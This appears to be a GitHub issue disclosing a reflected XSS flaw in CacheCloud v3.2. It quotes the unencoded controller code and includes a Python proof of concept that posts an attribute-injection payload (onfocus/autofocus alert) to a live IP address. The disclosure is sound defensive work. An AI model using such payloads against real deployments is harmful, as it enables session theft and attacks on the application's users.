-
Notifications
You must be signed in to change notification settings - Fork 2k
Open
Description
XSS vulnerability on /manage/app/resource/index
Summary
In the latest version (v3.2) of CacheCloud, the endpoint /manage/app/resource/index does not encode user-controllable parameters when outputting them on web page, resulting in XSS vulnerability. This allows attackers to launch XSS attacks against users.
Details
- SOURCE & SINK
// src/main/java/com/sohu/cache/web/controller/ResourceController.java#L44-L51
44: @RequestMapping({"/index"})
45: public ModelAndView index(Model model, String tabTag, String searchName) {
46: model.addAttribute("tabTag", tabTag);
47: model.addAttribute("searchName", searchName);
48: model.addAttribute("reourcesActive", SuccessEnum.SUCCESS.value());
49: return new ModelAndView("manage/resource/list");
50: }
51:
POC
import requests
from requests.sessions import Session
class CustomSession(Session):
def request(
self,
method,
url,
params = None,
data = None,
headers = None,
cookies = None,
files = None,
auth = None,
timeout = None,
allow_redirects = True,
proxies = None,
hooks = None,
stream = None,
verify = None,
cert = None,
json = None,
):
arg_names = (
'method', 'url', 'params', 'data', 'headers', 'cookies', 'files', 'auth', 'timeout',
'allow_redirects', 'proxies', 'hooks', 'stream', 'verify', 'cert', 'json'
)
local_variables = locals()
local_variables = {n: local_variables[n] for n in local_variables if n in arg_names}
local_variables['headers'] = local_variables.get('headers') or dict()
local_variables['headers'].update({'referer': 'http://34.169.199.145:40101/admin/app/list', 'User-Agent': 'oxpecker', 'accept-language': 'en-US', 'x-requested-with': 'XMLHttpRequest', 'origin': 'http://34.169.199.145:40101', 'upgrade-insecure-requests': '1', 'pragma': 'no-cache', 'cache-control': 'no-cache', 'accept-encoding': 'gzip, deflate'})
return super().request(**{n: local_variables[n] for n in local_variables if n in arg_names})
requests.sessions.Session = CustomSession
# ================================== Poc Start ===================================
import requests
url = 'http://34.169.199.145:40101/manage/app/resource/index'
malicious_payload = 'X" tabindex="1" autOfOCus ONfocUs=alert("zast-xss")//'
payload = {'searchName': malicious_payload, 'tabTag': ''}
response = requests.post(url, data=payload, verify=False, allow_redirects=False)
print('Status Code:', response.status_code)
print('Text:', response.text)
# =================================== Poc End ====================================
- Screenshot

Metadata
Metadata
Assignees
Labels
No labels